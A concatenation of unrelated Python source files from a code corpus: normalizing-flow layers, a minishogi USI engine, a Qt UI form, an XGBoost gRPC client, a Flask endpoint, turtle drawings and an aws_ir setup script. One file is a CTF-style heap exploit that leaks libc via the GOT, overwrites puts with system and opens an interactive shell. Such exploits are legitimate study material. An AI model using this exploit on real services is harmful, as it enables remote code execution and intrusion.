- t) # input = masked_x + (1 - self.mask) * ((output-t) / s) else: input = masked_y + (1 - self.mask) * (output - t) return input def _s_t_function(self, adj, x): # adj: (2,4,9,9) x: # (2,9,5) s = None h = x for i in range(len(self.net)): h = self.net[i](adj, h) # (2,1,9,hidden_dim) h = self.norm[i](h) # h = torch.tanh(h) # tanh may be more stable h = torch.relu(h) # use relu!!! for i in range(len(self.net_lin)-1): h = self.net_lin[i](h) # (2,1,9,hidden_dim) h = self.norm_lin[i](h) # h = torch.tanh(h) h = torch.relu(h) h = self.net_lin[-1](h) # h =h * torch.exp(self.scale*2) if self.affine: log_s, t = h.chunk(2, dim=-1) # x = sigmoid(log_x+bias): glow code Top 1 choice, keep s away from 0, s!!!!= 0 always safe!!! # And get the signal from added noise in the input # s = torch.sigmoid(log_s + 2) s = torch.sigmoid(log_s) # better validity + actnorm # s = torch.tanh(log_s) # Not stable when s =0 for synthesis data, but works well for real data in best case.... # s = torch.sign(s) # s = torch.sign(log_s) # s = F.softplus(log_s) # negative nll # s = torch.sigmoid(log_s) # little worse than +2, # *self.scale #!!! # scale leads to nan results # s = torch.tanh(log_s+2) # not that good # s = torch.relu(log_s) # nan results # s = log_s # nan results # s = torch.exp(log_s) # nan results else: t = h return s, t def test_AffineCoupling(): from mflow.models.model import rescale_adj torch.manual_seed(0) bs = 2 nodes = 9 ch = 5 num_edge_type = 4 # x = torch.ones((bs, nodes, ch), dtype=torch.float32) # 2 for duplicated flow for transforming whole info adj = torch.randint(0, 2, (bs, num_edge_type, nodes, nodes), dtype=torch.float32) # adj = rescale_adj(adj) gc = AffineCoupling(in_channel=4, hidden_channels={512,512}, affine=True) out = gc(adj) print('adj.shape:', adj.shape) # print('out', out.shape) # (bs, out_ch) print(out[0].shape, out[1].shape) r = gc.reverse(out[0]) print(r.shape) print(r) print('torch.abs(r-adj).mean():', torch.abs(r - adj).mean()) def test_GraphAffineCoupling(): from mflow.models.model import rescale_adj torch.manual_seed(0) bs = 2 nodes = 9 ch = 5 num_edge_type = 4 # x = torch.ones((bs, nodes, ch), dtype=torch.float32) # 2 for duplicated flow for transforming whole info x = torch.randint(0, 2, (bs, nodes, ch), dtype=torch.float32) adj = torch.randint(0, 2, (bs, num_edge_type, nodes, nodes), dtype=torch.float32) adj = rescale_adj(adj) in_dim = ch # 5 hidden_dim_dict = {'gnn': [8, 64], 'linear':[8]} gc = GraphAffineCoupling(nodes, in_dim, hidden_dim_dict, masked_row=range(0, nodes, 2), affine=True) # (num_nodes=nodes, num_relations=num_edge_type, num_features=ch, mask=mask, # batch_norm=True, # num_masked_cols=1, ch_list=[256, 256]) out = gc(adj, x) print('in', x.shape, adj.shape) # print('out', out.shape) # (bs, out_ch) print(out[0].shape, out[1].shape) print(out) r = gc.reverse(adj, out[0]) print(r) print(r.shape) print('torch.abs(r-x).mean():', torch.abs(r - x).mean()) if __name__ == '__main__': # test_AdditiveAdjCoupling() # test_AdditiveNodeFeatureCoupling() # test_GraphAffineCoupling() test_AffineCoupling()
StarcoderdataPython
11316282
import minishogilib import numpy as np import os from optparse import OptionParser import sys import tensorflow as tf import threading import mcts import network class USI: def __init__(self, weight_file): self.weight_file = weight_file self.nn = None self.search = None self.option = { 'ponder': False, 'softmax_sampling_moves': 30 } def isready(self): if self.nn is None: self.nn = network.Network() if self.weight_file is not None: self.nn.load(self.weight_file) self.config = mcts.Config() self.config.simulation_num = int(1e9) self.config.reuse_tree = True if self.search is None: self.search = mcts.MCTS(self.config) self.search.clear() self.position = minishogilib.Position() # ponder self.ponder_thread = None def start(self): while True: line = input() if not line: continue command = line.split() if command[0] == 'usi': print('id name erweitern_55') print('id author nyashiki') print('usiok') elif command[0] == 'setoption': key = command[2] value = command[4] if value == 'true' or value == 'True': value = True elif value == 'false' or value == 'False': value = False elif value.isdigit(): value = int(value) self.option[key.lower()] = value elif command[0] == 'position': self.ponder_stop() if command[1] == 'sfen': sfen_kif = ' '.join(command[2:]) self.position.set_sfen(sfen_kif) elif command[1] == 'startpos': self.position.set_start_position() else: print('ERROR: Unknown protocol.') elif command[0] == 'isready': self.isready() print('readyok') elif command[0] == 'usinewgame': pass elif command[0] == 'go': timelimit = {} for (i, val) in enumerate(command): if val == 'btime': timelimit['btime'] = int(command[i + 1]) elif val == 'wtime': timelimit['wtime'] = int(command[i + 1]) elif val == 'byoyomi': timelimit['byoyomi'] = int(command[i + 1]) moves = self.position.generate_moves() if len(moves) == 0: print('bestmove resign') else: checkmate, checkmate_move = self.position.solve_checkmate_dfs( 7) if checkmate: best_move = checkmate_move else: remain_time = timelimit['btime'] if self.position.get_side_to_move( ) == 0 else timelimit['wtime'] think_time = remain_time // 10 if think_time < timelimit['byoyomi']: think_time = remain_time + timelimit['byoyomi'] print('info string think time {}'.format( think_time), flush=True) root = self.search.run( self.position, self.nn, think_time, True) if self.position.get_ply() < self.option['softmax_sampling_moves']: best_move = self.search.softmax_sample_among_top_moves( root) else: best_move = self.search.best_move(root) print('bestmove {}'.format(best_move), flush=True) self.position.do_move(best_move) self.ponder_start() elif command[0] == 'd': self.position.print() elif command[0] == 'quit': os._exit(0) else: print('ERROR: Unknown command.', command[0]) def ponder_start(self): """ position: This position turn should be the other player's. """ self.ponder_thread = threading.Thread( target=self.search.run, args=(self.position, self.nn, 0, True, not self.option['ponder'])) self.ponder_thread.start() def ponder_stop(self): if self.ponder_thread is not None: self.search.stop() self.ponder_thread.join() self.ponder_thread = None if __name__ == '__main__': parser = OptionParser() parser.add_option('-w', '--weight_file', dest='weight_file', default=None, help='Weights of neural network parameters') (options, args) = parser.parse_args() usi = USI(options.weight_file) usi.start()
StarcoderdataPython
5167400
def aVeryBigSum(ar): # Write your code here for x in ar: x = sum(ar) return x ar = [1000000001, 1000000002, 1000000003, 1000000004, 1000000005] print(aVeryBigSum(ar)) # print(ar)
StarcoderdataPython
3425576
# -*- coding: utf-8 -*- from crosspm.helpers.locker import Locker class Usedby(Locker): def __init__(self, config, do_load, recursive): # Ignore do_load flag super(Usedby, self).__init__(config, False, recursive) def usedby_packages(self, deps_file_path=None, depslock_file_path=None, packages=None): """ Lock packages. Downloader search packages """ if deps_file_path is None: deps_file_path = self._deps_path if depslock_file_path is None: depslock_file_path = self._depslock_path if deps_file_path == depslock_file_path: depslock_file_path += '.lock' if packages is None: self.search_dependencies(deps_file_path) else: self._root_package.packages = packages self._log.info('Done!') def search_dependencies(self, depslock_file_path): self._log.info('Check dependencies ...') self._root_package.find_usedby(depslock_file_path, property_validate=True) self._log.info('') def entrypoint(self, *args, **kwargs): self.usedby_packages(*args, **kwargs)
StarcoderdataPython
132828
# -*- coding: utf-8 -*- from ..vendor import Qt from ..vendor.Qt import QtCore, QtGui, QtWidgets class Ui_Form(object): def setupUi(self, Form): Form.setObjectName("Form") Form.resize(556, 258) Form.setMinimumSize(QtCore.QSize(0, 0)) self.gridLayout = QtWidgets.QGridLayout(Form) self.gridLayout.setObjectName("gridLayout") self.buttonbox = QtWidgets.QDialogButtonBox(Form) self.buttonbox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok) self.buttonbox.setObjectName("buttonbox") self.gridLayout.addWidget(self.buttonbox, 1, 0, 1, 1) self.verticalLayout_5 = QtWidgets.QVBoxLayout() self.verticalLayout_5.setContentsMargins(-1, 0, -1, -1) self.verticalLayout_5.setObjectName("verticalLayout_5") self.verticalLayout = QtWidgets.QVBoxLayout() self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize) self.verticalLayout.setContentsMargins(-1, 5, -1, 5) self.verticalLayout.setObjectName("verticalLayout") self.groupBox_2 = QtWidgets.QGroupBox(Form) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth()) self.groupBox_2.setSizePolicy(sizePolicy) self.groupBox_2.setMinimumSize(QtCore.QSize(0, 0)) self.groupBox_2.setObjectName("groupBox_2") self.gridLayout_3 = QtWidgets.QGridLayout(self.groupBox_2) self.gridLayout_3.setObjectName("gridLayout_3") self.horizontalLayout_9 = QtWidgets.QHBoxLayout() self.horizontalLayout_9.setSpacing(0) self.horizontalLayout_9.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize) self.horizontalLayout_9.setContentsMargins(-1, 0, -1, 0) self.horizontalLayout_9.setObjectName("horizontalLayout_9") self.button_preview = QtWidgets.QHBoxLayout() self.button_preview.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize) self.button_preview.setObjectName("button_preview") self.horizontalLayout_9.addLayout(self.button_preview) self.verticalLayout_2 = QtWidgets.QVBoxLayout() self.verticalLayout_2.setSpacing(1) self.verticalLayout_2.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize) self.verticalLayout_2.setContentsMargins(-1, 0, -1, 0) self.verticalLayout_2.setObjectName("verticalLayout_2") self.horizontalLayout_5 = QtWidgets.QHBoxLayout() self.horizontalLayout_5.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint) self.horizontalLayout_5.setContentsMargins(-1, 0, -1, -1) self.horizontalLayout_5.setObjectName("horizontalLayout_5") spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_5.addItem(spacerItem) self.label_7 = QtWidgets.QLabel(self.groupBox_2) self.label_7.setObjectName("label_7") self.horizontalLayout_5.addWidget(self.label_7) self.spinbox_btn_position_x = QtWidgets.QSpinBox(self.groupBox_2) self.spinbox_btn_position_x.setMinimumSize(QtCore.QSize(70, 0)) self.spinbox_btn_position_x.setMaximumSize(QtCore.QSize(16777215, 16777215)) self.spinbox_btn_position_x.setMaximum(9999) self.spinbox_btn_position_x.setObjectName("spinbox_btn_position_x") self.horizontalLayout_5.addWidget(self.spinbox_btn_position_x) self.label_6 = QtWidgets.QLabel(self.groupBox_2) self.label_6.setObjectName("label_6") self.horizontalLayout_5.addWidget(self.label_6) self.spinbox_btn_position_y = QtWidgets.QSpinBox(self.groupBox_2) self.spinbox_btn_position_y.setMinimumSize(QtCore.QSize(70, 0)) self.spinbox_btn_position_y.setMaximum(9999) self.spinbox_btn_position_y.setObjectName("spinbox_btn_position_y") self.horizontalLayout_5.addWidget(self.spinbox_btn_position_y) self.verticalLayout_2.addLayout(self.horizontalLayout_5) self.horizontalLayout_2 = QtWidgets.QHBoxLayout() self.horizontalLayout_2.setContentsMargins(-1, 0, -1, -1) self.horizontalLayout_2.setObjectName("horizontalLayout_2") spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_2.addItem(spacerItem1) self.label = QtWidgets.QLabel(self.groupBox_2) self.label.setObjectName("label") self.horizontalLayout_2.addWidget(self.label) self.spinbox_line_length = QtWidgets.QSpinBox(self.groupBox_2) self.spinbox_line_length.setMinimumSize(QtCore.QSize(70, 0)) self.spinbox_line_length.setMaximum(9999) self.spinbox_line_length.setObjectName("spinbox_line_length") self.horizontalLayout_2.addWidget(self.spinbox_line_length) self.verticalLayout_2.addLayout(self.horizontalLayout_2) self.horizontalLayout_8 = QtWidgets.QHBoxLayout() self.horizontalLayout_8.setContentsMargins(-1, 0, -1, -1) self.horizontalLayout_8.setObjectName("horizontalLayout_8") spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_8.addItem(spacerItem2) self.label_8 = QtWidgets.QLabel(self.groupBox_2) self.label_8.setObjectName("label_8") self.horizontalLayout_8.addWidget(self.label_8) self.spinbox_line_width = QtWidgets.QSpinBox(self.groupBox_2) self.spinbox_line_width.setMinimumSize(QtCore.QSize(70, 0)) self.spinbox_line_width.setMaximum(9999) self.spinbox_line_width.setObjectName("spinbox_line_width") self.horizontalLayout_8.addWidget(self.spinbox_line_width) self.verticalLayout_2.addLayout(self.horizontalLayout_8) self.horizontalLayout_11 = QtWidgets.QHBoxLayout() self.horizontalLayout_11.setSpacing(6) self.horizontalLayout_11.setContentsMargins(-1, 0, -1, -1) self.horizontalLayout_11.setObjectName("horizontalLayout_11") spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_11.addItem(spacerItem3) self.label_5 = QtWidgets.QLabel(self.groupBox_2) self.label_5.setObjectName("label_5") self.horizontalLayout_11.addWidget(self.label_5) self.combo_style = QtWidgets.QComboBox(self.groupBox_2) self.combo_style.setObjectName("combo_style") self.combo_style.addItem("") self.combo_style.addItem("") self.horizontalLayout_11.addWidget(self.combo_style) self.verticalLayout_2.addLayout(self.horizontalLayout_11) self.horizontalLayout_3 = QtWidgets.QHBoxLayout() self.horizontalLayout_3.setContentsMargins(-1, 0, -1, -1) self.horizontalLayout_3.setObjectName("horizontalLayout_3") spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_3.addItem(spacerItem4) self.label_4 = QtWidgets.QLabel(self.groupBox_2) self.label_4.setObjectName("label_4") self.horizontalLayout_3.addWidget(self.label_4) self.spinbox_label_font_size = QtWidgets.QSpinBox(self.groupBox_2) self.spinbox_label_font_size.setMinimumSize(QtCore.QSize(70, 0)) self.spinbox_label_font_size.setObjectName("spinbox_label_font_size") self.horizontalLayout_3.addWidget(self.spinbox_label_font_size) self.verticalLayout_2.addLayout(self.horizontalLayout_3) self.horizontalLayout_4 = QtWidgets.QHBoxLayout() self.horizontalLayout_4.setContentsMargins(-1, 0, -1, -1) self.horizontalLayout_4.setObjectName("horizontalLayout_4") spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_4.addItem(spacerItem5) self.checkbox_use_label = QtWidgets.QCheckBox(self.groupBox_2) self.checkbox_use_label.setText("") self.checkbox_use_label.setChecked(True) self.checkbox_use_label.setObjectName("checkbox_use_label") self.horizontalLayout_4.addWidget(self.checkbox_use_label) self.label_label = QtWidgets.QLabel(self.groupBox_2) self.label_label.setObjectName("label_label") self.horizontalLayout_4.addWidget(self.label_label) self.line_label = QtWidgets.QLineEdit(self.groupBox_2) self.line_label.setObjectName("line_label") self.horizontalLayout_4.addWidget(self.line_label) self.verticalLayout_2.addLayout(self.horizontalLayout_4) self.horizontalLayout_12 = QtWidgets.QHBoxLayout() self.horizontalLayout_12.setContentsMargins(-1, -1, -1, 0) self.horizontalLayout_12.setObjectName("horizontalLayout_12") spacerItem6 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_12.addItem(spacerItem6) self.label_2 = QtWidgets.QLabel(self.groupBox_2) self.label_2.setObjectName("label_2") self.horizontalLayout_12.addWidget(self.label_2) self.button_color = QtWidgets.QPushButton(self.groupBox_2) self.button_color.setObjectName("button_color") self.horizontalLayout_12.addWidget(self.button_color) self.verticalLayout_2.addLayout(self.horizontalLayout_12) self.horizontalLayout_9.addLayout(self.verticalLayout_2) self.horizontalLayout_9.setStretch(0, 2) self.horizontalLayout_9.setStretch(1, 1) self.gridLayout_3.addLayout(self.horizontalLayout_9, 0, 0, 1, 1) self.verticalLayout.addWidget(self.groupBox_2) self.verticalLayout_5.addLayout(self.verticalLayout) self.gridLayout.addLayout(self.verticalLayout_5, 0, 0, 1, 1) self.retranslateUi(Form) QtCore.QMetaObject.connectSlotsByName(Form) def retranslateUi(self, Form): Form.setWindowTitle(Qt.QtCompat.translate("Form", "Form", None, -1)) self.groupBox_2.setTitle(Qt.QtCompat.translate("Form", "partition", None, -1)) self.label_7.setText(Qt.QtCompat.translate("Form", "Position ", None, -1)) self.label_6.setText(Qt.QtCompat.translate("Form", "×", None, -1)) self.label.setText(Qt.QtCompat.translate("Form", "LineLength ", None, -1)) self.label_8.setText(Qt.QtCompat.translate("Form", "LineWidth ", None, -1)) self.label_5.setText(Qt.QtCompat.translate("Form", "Style ", None, -1)) self.combo_style.setItemText(0, Qt.QtCompat.translate("Form", "Horizontal", None, -1)) self.combo_style.setItemText(1, Qt.QtCompat.translate("Form", "Vertical", None, -1)) self.label_4.setText(Qt.QtCompat.translate("Form", "Label Font Size ", None, -1)) self.label_label.setText(Qt.QtCompat.translate("Form", "Label ", None, -1)) self.label_2.setText(Qt.QtCompat.translate("Form", "Color", None, -1)) self.button_color.setText(Qt.QtCompat.translate("Form", "SelectColor", None, -1))
StarcoderdataPython
1853424
<reponame>hzy001/xgboost-serving-1<filename>tensorflow_serving/example/xgboost_client.py # Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== #!/usr/bin/env python2.7 """A client that talks to tensorflow_model_server. Typical usage example: xgboost_client.py --num_tests=100 --server=localhost:9000 """ from __future__ import print_function import sys import time import grpc import numpy import random from grpc._cython.cygrpc import CompressionAlgorithm from grpc._cython.cygrpc import CompressionLevel from tensorflow_serving.apis import predict_pb2 from tensorflow_serving.apis import prediction_service_pb2 from tensorflow_serving.apis import prediction_service_pb2_grpc from google.protobuf import text_format import tensorflow as tf tf.compat.v1.app.flags.DEFINE_integer('num_tests', 1, 'Number of tests') tf.compat.v1.app.flags.DEFINE_string('server', '', 'PredictionService host:port') FLAGS = tf.compat.v1.app.flags.FLAGS def do_inference(hostport, num_tests): """Tests PredictionService with requests. Args: hostport: Host:port address of the PredictionService. num_tests: Number of test images to use. Returns: void. """ host, port = hostport.split(':') options = [ ("grpc.default_compression_algorithm", CompressionAlgorithm.gzip), ("grpc.grpc.default_compression_level", CompressionLevel.high) ] channel = grpc.insecure_channel(hostport, options) stub = prediction_service_pb2_grpc.PredictionServiceStub(channel) for _ in range(num_tests): request = predict_pb2.PredictRequest() request.model_spec.name = 'test' # request.model_spec.version.value = 1 xgboost_feature_score_1 = predict_pb2.FeatureScore( id=[2, 34, 2000, 2206], score=[1, 1, 0.646667, 0.727273], ) xgboost_features = [xgboost_feature_score_1 for i in range(0, 1)] xgboost_feature_vector = predict_pb2.FeatureScoreVector(feature_score=xgboost_features) request.inputs['xgboost_features'].CopyFrom(xgboost_feature_vector) response = stub.Predict(request, 30.0) print(response) def main(_): if FLAGS.num_tests > 10000: print('num_tests should not be greater than 10k') return if not FLAGS.server: print('please specify server host:port') return do_inference(FLAGS.server, FLAGS.num_tests) if __name__ == '__main__': tf.compat.v1.app.run()
StarcoderdataPython
6416308
<reponame>iandtek/realtor-deals-analyzer<filename>app.py from flask import Flask import json app = Flask(__name__) @app.route("/properties") def properties(): return {'properties': json.load(open('properties.json'))} if __name__ == "__main__": app.run()
StarcoderdataPython
4801259
<filename>tests/test_cookie.py #!/usr/bin/python3 """ Testing the supposedly beautiful command line parsing @author chairs """ import unittest from cookie.cookie import Cookie app = Cookie(__name__, notes=('simple', 'test')) class TestCookie (unittest.TestCase): def test_notes (self): """ Ensure that the notes feature of the Cookie class is in working order """ self.assertEqual(('simple', 'test'), app.notes) def test_decorator (self): """ Ensure that the decorator is working as expected """ @app.get_args def test_function (name=str()): return 'Hello %s!' % name app.run(test_function) assert 'Usage: ' in app.outline if __name__ == '__main__': unittest.main()
StarcoderdataPython
9666464
<filename>ovl/target_filters/contour_filters.py from typing import Tuple import math import cv2 from ..math.contours import contour_center from ..math.geometry import distance_between_points from ..math.image import distance_from_frame from .contour_filter import contour_filter from ..utils.types import RangedNumber from ..utils.constants import DEFAULT_IMAGE_HEIGHT, DEFAULT_IMAGE_WIDTH from ..math import image @contour_filter def image_center_filter(contour_list, image_dimensions: Tuple[int, int] = (DEFAULT_IMAGE_WIDTH, DEFAULT_IMAGE_HEIGHT), min_ratio: RangedNumber(0, 1) = 0.7, max_ratio: RangedNumber(0, 1) = math.inf): """ Filters out contours that their center is not close enough to the center of the image :param contour_list: a list of contours to be filtered :param image_dimensions: the size of the image(width, height) :param min_ratio: the minimum ratio between the distance from the image center to the distance from the frame :param max_ratio: the maximum ratio between the distance from the image center to the distance from the frame :return: list of contours within the maximum distance from the image center """ output = [] ratio = [] image_center = image.image_center(image_dimensions) for contour in contour_list: current_contour_center = contour_center(contour) distance_from_image_center = distance_between_points(current_contour_center, image_center) distance_from_image_frame = distance_from_frame(current_contour_center, image_dimensions) distance_ratio = distance_from_image_center / distance_from_image_frame if min_ratio <= distance_ratio <= max_ratio: output.append(contour) ratio.append(distance_ratio) return output, ratio @contour_filter def distance_filter(contour_list, point: Tuple[int, int], min_dist: float = 0, max_dist: float = 50): """ Filters out contours that their center is not close enough to the given (x, y) point in the image :param contour_list: a list of contours to be filtered :param point: the point from which the contours should be filtered a tuple (or list) of 2 numbers. :param max_dist: the maximum distance from the point in pixels :param min_dist: the minimum distance from the point in pixels :return: the filtered contour list """ output = [] ratio = [] for contour in contour_list: current_contour_center = contour_center(contour) distance_from_center = distance_between_points(current_contour_center, point) if max_dist >= distance_from_center >= min_dist: output.append(contour) ratio.append(distance_from_center) return output, ratio @contour_filter def absolute_distance_filter(contour_list, max_dist=50, min_dist=0, image_dimensions=(DEFAULT_IMAGE_WIDTH, DEFAULT_IMAGE_HEIGHT)): """ Filters out contours that their center is not close enough to the center of the image :param contour_list: a list of contours to be filtered :param image_dimensions: the size of the image(width, height) :param max_dist: the maximum distance from the center in pixels :param min_dist: the minimum distance from the center in pixels :return: """ output = [] ratio = [] image_center = (image_dimensions[0] / 2 - .5, image_dimensions[1] / 2 - .5) for contour in contour_list: current_contour_center = contour_center(contour) distance_from_center = distance_between_points(current_contour_center, image_center) if max_dist >= distance_from_center >= min_dist: output.append(contour) ratio.append(distance_from_center) return output, ratio @contour_filter def length_filter(contour_list, min_length=50, max_length=76800): """ Receives a list of contours and removes ones that are not long enough Note: for "open" contours only! :param contour_list: list of contours (numpy array) to be filtered :param min_length: minimum length of a contour (in pixels) :param max_length: maximum length of a contour (in pixels) :return: list of filtered contours and list of the lengths """ output = [] ratio = [] for contour in contour_list: perimeter = cv2.arcLength(contour, False) if min_length >= perimeter >= max_length: output.append(contour) ratio.append(perimeter) return output, ratio @contour_filter def area_filter(contour_list, min_area: float = 200, max_area: float = math.inf): """ Filters contours that are not within the threshold of area (in pixels) :param max_area: maximum area of a contour (Inclusive) default is no limit (infinity) :param min_area: minimum area of a contour (Inclusive) set to 0 for no lower limit. :param contour_list: List of Contours to filter :return: the contour list filtered. """ output_list = [] ratio_list = [] for contour in contour_list: contour_area = cv2.contourArea(contour) if min_area <= contour_area <= max_area: output_list.append(contour) ratio_list.append(contour_area) return output_list, ratio_list @contour_filter def percent_area_filter(contour_list, minimal_percent: RangedNumber(0, 1) = 0.02, maximum_percent: RangedNumber(0, 1) = 1, image_dimensions: Tuple[int, int] = (DEFAULT_IMAGE_WIDTH, DEFAULT_IMAGE_HEIGHT)): """ Filters out contours that are not in the specified ratio to the area of the image (1% -> 0.1) :param contour_list: list of contours to be filtered (numpy.ndarray) :param minimal_percent: the minimal ratio between the contour area and the image area :param maximum_percent: the maximum ratio between the contour area and the image area :param image_dimensions: The (width, height) of the image in pixels, """ output, ratios = [], [] output_append = output.append ratio_append = ratios.append image_size = image_dimensions[0] * image_dimensions[1] if image_size == 0: raise ValueError("Invalid image dimensions, Received (width, height): {}, {}".format(*image_dimensions)) for contour in contour_list: contour_area = cv2.contourArea(contour) percent_area = contour_area / image_size if minimal_percent <= percent_area <= maximum_percent: ratio_append(percent_area) output_append(contour) return output, ratios @contour_filter def size_ratio_filter(contours, min_ratio: float = 2, max_ratio: float = math.inf, reverse_ratio=False): """ Sorts out contours by the ratio between their width and height :param contours: the contours to be filtered :param min_ratio: the minimum ratio :param max_ratio: the maximum ratio default :param reverse_ratio: reversed the ratio to be height to width :return: the filtered list """ output, ratios = [], [] output_append = output.append ratios_append = ratios.append for contour in contours: _, _, width, height = cv2.boundingRect(contour) if 0 in (width, height): raise ValueError( "The width or height of one of the contours was 0,\n" " try using an area filter before this filter") size_ratio = height / width if reverse_ratio else width / height if min_ratio <= size_ratio <= max_ratio: output_append(contour) ratios_append(size_ratio) return output, ratios
StarcoderdataPython
4859608
import socket import telnetlib import struct from hexdump import hexdump def q(a): return struct.pack("I", a) def interact(): t = telnetlib.Telnet() t.sock = s t.interact() def r_until(st): ret = "" while st not in ret: ret += s.recv(8192) return ret s = socket.create_connection(("localhost", 2323)) print r_until("option") s.send("1\n16\n1\n16\n1\n16\n") print r_until("option") # 0x61616165 <-- 0x51515151 #dat = "a"*0x18+q(0x25)+q(0x51515151)+q(0x61616161) # 0x804a06C <-- 0x804A004 dat = "/bin/sh\x00"+"a"*0x10+q(0x25)+q(0x804A004)+q(0x804a06C-4) s.send("3\n0\n100\n") print r_until("your data.") s.send(dat) print r_until("option") s.send("2\n1\n") print r_until("option") s.send("4\n3\n") dat = r_until("option") fflush = struct.unpack("I", dat.split("id.\n")[1][0:4])[0] libc_base = fflush - 0x657a0 system = libc_base + 0x3f430 print hex(libc_base) # phase 2, change puts to be system s.send("3\n3\n100\n") print r_until("your data.") s.send(q(fflush)+q(system)) # puts is broken here s.send("4\n0\n") print "** interact **" interact()
StarcoderdataPython
238249
import unittest from hamcrest import assert_that, equal_to from lxslt import MatchName, DeepDive class DeepDiveTest(unittest.TestCase): @classmethod def setUpClass(cls): cls.diver = DeepDive(MatchName('child')) def test_find_on_first_level(self): tree = ['root', ['child']] back = self.diver.project(tree) assert_that(list(back), equal_to([['child']])) def test_find_on_second_level(self): tree = ['root', ['child', ['child', 'level2']]] back = self.diver.project(tree) assert_that(list(back), equal_to([['child', 'level2']])) def test_find_several_on_deep_level(self): tree = ['root', ['child', ['child', ['level2'], ['child', ['level3']], ['child', ['child', 'levelN']]]]] back = self.diver.project(tree) assert_that(list(back), equal_to( [['child', ['level3']], ['child', 'levelN']])) def test_stop_dive_on_mismatch(self): tree = ['root', ['child', ['stop-dive', ['child', 'nested']]]] back = self.diver.project(tree) assert_that(list(back), equal_to( [['child', ['stop-dive', ['child', 'nested']]]])) def test_dive_on_headless_nodes(self): tree = [[['child', [[['child', ['child', ['x', 'aaa']]]]]]]] back = self.diver.project(tree) assert_that(list(back), equal_to( [['child', ['x', 'aaa']]])) if '__main__' == __name__: unittest.main()
StarcoderdataPython
6494235
<gh_stars>0 from threading import Thread from . import test_cipher from . import test_digest class ThreadedTester(Thread): failed = False def run(self): try: test_digest.test_digest() test_cipher.test_cipher(['a' * 1000, 'd' * 1000]) # test_evp.test_rand() except Exception as e: self.failed = True self.exception = e def test_threaded_crypto(): threads = [ThreadedTester() for i in range(10)] map(lambda t: t.start(), threads) # wait for the threads to complete map(lambda t: t.join(), threads) assert all(not t.failed for t in threads), "Some threads failed" if __name__ == '__main__': test_threaded_crypto()
StarcoderdataPython
1890866
<gh_stars>1-10 loot = input().split("|") cmd = input() class Treasure: def __init__(self, loot): self.loot = loot def loot_items(self, found_treasure): for item in found_treasure: if item not in self.loot: self.loot.insert(0, item) def drop(self, idx): if idx in range(len(self.loot)): self.loot.append(self.loot.pop(idx)) def steal(self, count): if count > len(self.loot): count = len(self.loot) stolen = [] for _ in range(count): stolen.append(self.loot.pop()) print(', '.join(reversed(stolen))) def __repr__(self): if self.loot: gains = list(map(len, self.loot)) average_gain = sum(gains) / len(self.loot) return f'Average treasure gain: {average_gain:.2f} pirate credits.' return 'Failed treasure hunt.' treasure = Treasure(loot) while not cmd == "Yohoho!": command = cmd.split()[0] if command == "Loot": items = cmd.split()[1:] treasure.loot_items(items) elif command == "Drop": loot_index = int(cmd.split()[1]) treasure.drop(loot_index) elif command == "Steal": items_count = int(cmd.split()[1]) treasure.steal(items_count) cmd = input() print(treasure)
StarcoderdataPython
263044
<reponame>fabiangunzinger/python_pottering import turtle def koch(t, n): """Draw a Koch curve of length n.""" if n < 25: t.fd(n) return koch(t, n/3) t.lt(60) koch(t, n/3) t.rt(120) koch(t, n/3) t.lt(60) koch(t, n/3) def snowflake(t, n): """Draw a Koch snowflake.""" for i in range(3): koch(t, n) t.rt(120) bob = turtle.Turtle() bob.pu() bob.goto(-150, 90) bob.pd() koch(bob, 300) turtle.mainloop()
StarcoderdataPython
5125951
import re from distutils.command.build import build from setuptools import setup from setuptools.command.install import install as _install VERSION = re.search( r"^__version__ = ['\"]([^'\"]*)['\"]", open('aws_ir/_version.py', 'r').read(), re.MULTILINE ).group(1) class install(_install): def run(self): self.run_command('build') _install.run(self) setup(name="aws_ir", version=VERSION, author="<NAME>, <NAME>, <NAME>, <NAME>", author_email="<EMAIL>,<EMAIL>,<EMAIL>", packages=["aws_ir", "aws_ir/libs", "aws_ir/plans"], license="MIT", description="AWS Incident Response ToolKit", scripts=['bin/aws_ir'], url='https://github.com/ThreatResponse/aws_ir', download_url="https://github.com/ThreatResponse/aws_ir/archive/v0.3.0.tar.gz", use_2to3=True, install_requires=['boto3>=1.3.0', 'progressbar_latest', 'logutils==0.3.3', 'requests', 'structlog', 'pytz', 'jinja2', 'pluginbase', 'margaritashotgun>=0.4.1', 'aws-ir-plugins>=0.0.2' ], tests_require=['pytest', 'pytest-cov', 'moto', 'mock', 'magicmock'], )
StarcoderdataPython
1991086
from ..contrib.auth.signals import *
